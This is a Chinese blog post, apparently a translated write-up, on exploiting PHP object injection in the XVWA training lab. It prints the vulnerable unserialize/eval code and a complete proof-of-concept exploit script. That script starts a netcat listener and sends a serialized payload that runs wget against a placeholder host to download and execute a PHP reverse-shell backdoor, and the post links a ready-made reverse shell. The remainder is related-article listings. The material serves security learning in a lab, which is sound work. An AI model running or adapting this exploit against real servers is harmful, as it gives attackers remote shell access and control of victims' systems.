php对象注入,PHP序列化/对象注入漏洞分析

最新推荐文章于 2023-04-17 16:49:27 发布
最新推荐文章于 2023-04-17 16:49:27 发布
阅读量173 收藏
点赞数
文章标签: php对象注入

本文是关于PHP序列化/对象注入漏洞分析的短篇,里面讲述了如何获取主机的远程shell。

如果你想自行测试这个漏洞,你可以通过 XVWA 和 Kevgir 进行操作。

漏洞利用的第一步,我们开始测试目标应用是否存在PHP序列化。为了辅助测试,我们使用了Burpsuite的SuperSerial插件,下载地址在 这里 。它会被动检测PHP和Java序列化的存在。

分析

我们检测到了应用里使用了PHP序列化,所以我们可以开始确认应用代码里是否含有远程代码执行漏洞。需要注意的是,序列化对象是从参数“r”取来的:

$var1=unserialize($_REQUEST['r']);

然后再进行反序列化和eval:

eval($this->inject);

接着,执行:

echo "
".$var1[0]." - ".$var1[1];

有了这些,如果我们绕过了参数r的PHP序列化对象,那么就可以获得代码执行漏洞了!

< ?php

error_reporting(E_ALL);

class PHPObjectInjection{

public $inject;

function __construct(){

}

function __wakeup(){

if(isset($this->inject)){

eval($this->inject);

}

}

}

//?r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"XtremeVulnerable Web Application";}

if(isset($_REQUEST['r'])){

$var1=unserialize($_REQUEST['r']);

if(is_array($var1)){

echo "

".$var1[0]." - ".$var1[1];

}

}else{

echo "parameter is missing";

}

? >

漏洞利用为了利用这个漏洞,我们创建了一个简单的PHP脚本来自动生成PHP序列化payload,以及在目标远程主机上运行我们想要的命令。然后,我创建了一个通用的PHP反弹shell,下载地址如下:

http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz注意: 你需要把这个文件传到web服务器上,改动反弹shell脚本里面的本地ip和端口,以及下面的利用代码:

/*

PHP Object Injection PoC Exploit by 1N3@CrowdShield - https://crowdshield.com

A simple PoC to exploit PHP ObjectInjections flaws and gain remote shell access.

Shouts to @jstnkndy @yappare for theassist!

NOTE: This requireshttp://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gzsetup on a remote host with a connect back IP configured

*/

print"==============================================================================\r\n";

print "PHP Object Injection PoCExploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";

print"==============================================================================\r\n";

print "[+] Generating serializedpayload...[OK]\r\n";

print "[+] Launching reverselistener...[OK]\r\n";

system('gnome-terminal -x sh -c \'nc -lvvp1234\'');

class PHPObjectInjection

{

//CHANGE URL/FILENAME TO MATCH YOUR SETUP

public $inject = "system('wget http://yourhost/phpobjbackdoor.txt-O phpobjbackdoor.php && php phpobjbackdoor.php');";

}

$url ='http://targeturl/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TOTARGET URL/PARAMETER

$url = $url . urlencode(serialize(newPHPObjectInjection));

print "[+] Sendingexploit...[OK]\r\n";

print "[+] Dropping down tointeractive shell...[OK]\r\n";

print"==============================================================================\r\n";

$response =file_get_contents("$url");

? >

Demo

现在咱们的利用脚本已经就绪,我们可以执行它来得到远程主机上的反弹shell,用来远程执行命令!

以上就是本文的全部内容,希望对大家学习php程序设计有所帮助。

翔宇情
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP序列化/对象注入漏洞分析
10-22
主要为大家详细介绍了PHP序列化/对象注入漏洞分析PHP序列化/对象注入漏洞的利用,感兴趣的小伙伴们可以参考一下
php序列化 对象注入漏洞
苟有恒,必有三更眠,五更起。
03-10 617
简介 php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险。 分析 php基础 serialize 把一个对象转成字符串形式, 可以用于保存 unserialize 把serialize序列化后的字符串变成一个对象 php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的, 比如 __construct,...
Usenix 2022 夏季论文简单分类
^_^
01-16 6562
最近发现Usenix 2022夏季的paper已经出了,所以扫扫看有没有有趣的文章,对文章进行了简单的分类。基于个人知识分类,可能分类不是那么准确。也可以等usenix 2022上了dblp看官方的分类。 文章目录二进制fuzz软件安全物联网声音相关侧信道可信计算内核云安全嵌入式设备AI模型安全驾驶系统移动安全LTE(通信安全?)密码学网络安全Web安全隐私未分类 二进制 DeepDi: Learning a Relational Graph Convolutional Network Model on.
带你搞懂PHP对象注入详细教程
我的博客,不一样的自我表达
04-17 371
不过需要注意的是,利用场景不限于magic函数,也有一些方式可以在一半的函数中利用这个漏洞,打个比方,一个模块可能定义了一个叫get的函数进行一些敏感的操作,比如访问数据库,这就可能造成sql注入,取决于函数本身的操作。你可以看到,我们创建了一个对象序列化了它(然后__sleep被调用),之后用序列化对象重建后的对象创建了另一个对象,接着php脚本结束的时候两个对象的__destruct都会被调用。事实上,利用这玩意的可能性有很多种,关键取决于应用程序的流程与,可用的类,与magic函数。
理解PHP对象注入
清枫逸寒
02-22 697
PHP对象注入并不是一种十分常见的漏洞,这种漏洞可能会比较难利用,但是这种漏洞可能比较危险。为了学习这种漏洞,首先需要理解基础的PHP代码。
PHP Object Injection
weixin_30472035的博客
07-11 150
http://www.phpchina.com/portal.php?mod=view&aid=39852 https://crowdshield.com/blog.php?name=exploiting-php-serialization-object-injection-vulnerabilities https://www.owasp.org/index.php/PHP_Obj...
浅析PHP序列化中过滤函数使用不当导致的对象注入问题
12-20
#### 正常的反序列化语句是这样的 $a=’a:2:{s:8:”username”;s:7:”dimpl3s”;s:8:”password”;s:6:”abcdef”;}’; 但是如果写成这样 $b=’a:2:{s:8:”username”;s:7:”dimpl3s”;s:8:”password”;s:6:”...
PHP多种序列化/反序列化的方法详解
10-19
本篇文章主要介绍了PHP多种序列化/反序列化的方法详解,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
非常见SQL注入漏洞及利用 Unusual SQL injection vulnerabilities and how to exploit them
zhaohengyuan的专栏
04-08 7891
by By ogdan Calin    在本篇文章中,我会谈到一些不常见的SQL注入漏洞,并且说明如何利用这些漏洞。    和最近所报道的一些典型的SQL注入不同,在这种形式的注入漏洞中,攻击者可以控制SQL语句中的 ORDER BY,LIMIT或者GROUP BY 子句。    本篇文章中所有的示例都采用MySql做为终端数据库,这些技巧也可以用到其他数据库中。    
深入讲解PHP对象注入(Object Injection)
12-19
前言 虽然这篇文章叫做PHP对象注入,但是本质上还是和PHP序列化的不正确使用有关。如果你阅读了PHP中的SESSION序列化机制对序列化就会有一个大致的认识。PHP对象注入其实本质上也是由于序列化引起的。 基础知识 在php类中可能会存在一些叫做魔术函数(magic 函数),这些函数会在类进行某些事件的时候自动触发,例如__construct()会在一个对象被创建时调用, __destruct()会在一个对象销毁时调用, __toString当对象被当做一个字符串的时候被调用。常见的魔术函数有__construct() 、 __destruct() 、 __toString() 、 __
php序列化利用_利用PHP序列化
weixin_26722031的博客
08-30 438
php序列化利用Serialization is when an object in a programming language (say, a Java or PHP object) is converted into a format that can be stored or transferred. Whereas deserialization refers to the oppos...
PHP对象注入
Fly_鹏程万里
09-17 1354
在理解对象注入之前要知道的一些东西。 PHP中的序列化 在说序列化之前,我记得以前有过这样一个疑问:为什么需要序列化? 后来我在网上搜到了这样一个回答很好的解决了我的疑问。 “你有一个应用程序,需要传一些数据给其它应用程序,但数据保存在你的进程的堆栈中,其它进程无法访问你的应用程序进程的堆栈,要想把你的程序的数据给其它程序使用,必须将数据以某种形式传给其它进程,这个‘某种形式’就是序列化 ...
PHP序列化漏洞学习
qq_62078839的博客
07-14 326
序列化是将变量转换为可保存或传输的字符串的过程,反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。序列化:反序列化: 例如: 输出的结果为: 在序列化后的结果中的字母标识为: 在这个代码中运用到了 __construct()魔术方法序列化魔术方法这里拿PIKACHU靶场一题来举例 这里给了一个例子我们看看源码 这里并没有出现什么危险函数但construct析构函数中有个打印字符串的函数我们可以利用XSS漏洞弹个窗......
PHP】反序列化漏洞(又名“PHP对象注入”)
weixin_45844670的博客
08-22 3032
PHP对象注入(俗称反序列化漏洞)相关函数漏洞成因实现例子 相关函数 在利用这个漏洞之前我们要先了解相关的函数都有什么,弱点在哪里 看不懂下面的不要紧 后面我会慢慢解释 unserialize() 对单一的已序列化的变量进行操作,将其转换回 PHP 的值。返回的是转换之后的值,可为 integer、float、string、array 或 object。如果传递的字符串不可解序列化,则返回 FALSE。与之相对的函数serialize()序列化函数。 掌握语言的最好方法就是自己动手敲 我们举个例子 &l
php序列化注入,PHP序列化由浅入深
weixin_33278498的博客
03-09 586
0x00 PHP序列化是什么两个函数serialize() //将一个对象转换成一个字符串unserialize() //将字符串还原成一个对象通过序列化与反序列化我们可以很方便的在PHP中进行对象的传递。本质上反序列化是没有危害的。但是如果用户对数据可控那就可以利用反序列化构造payload攻击。示例序列化class test{private $flag = "flag{233}";...
序列化和反序列化、以及反序列化注入问题要点
席同学的博客
07-04 1601
所有你想要的东西都标着价格 序列化的实体是个对象,结果也是个对象,并非是格式化文本,你在记事本里看到的购物信息保存记录,其实不是对象序列化的结果,而是对象输出的格式化文本,真正的序列化对象是看不懂的。 序列化的应用场景 在实际使用对象序列化时, 一种应用场景是将对象序列化到持久化存储(本地硬盘),我们此时不想做文件解析,也不想有人读懂这个持久化文件,当我们需要时,可以直接采用反序列化将保存的文件...
[天翼杯 2021]esay_eval
qq_64201116的博客
06-09 455
初逢redis,获取工具redis工具,了解ssrf
如何发现涉及php序列化操作的漏洞
最新发布
11-17
输入验证是防范PHP序列化漏洞的基本措施,确保所有的输入数据都被正确验证和过滤,以防止恶意数据的注入。这可以有效地减少潜在的安全漏洞。 最后,密切关注安全漏洞的最新动态和公开的安全通告。PHP序列化漏洞是一...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值